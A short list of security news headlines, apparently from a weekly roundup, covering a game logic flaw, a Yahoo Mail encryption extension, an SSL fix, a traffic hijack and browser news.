Grand Theft Auto Logic Flaw Leads To Real Money
User-Focused Security: End-to-End Encryption Extension for Yahoo Mail
New Mystery SSL Fix To Be Released Thursday

Notable stories this week that didn’t make the cut:
Strange snafu hijacks UK nuke maker’s traffic, routes it through Ukraine
Microsoft Is Killing off the Internet Explorer Brand (now called Spartan)
Chromium to Block RFC1918 (Probably)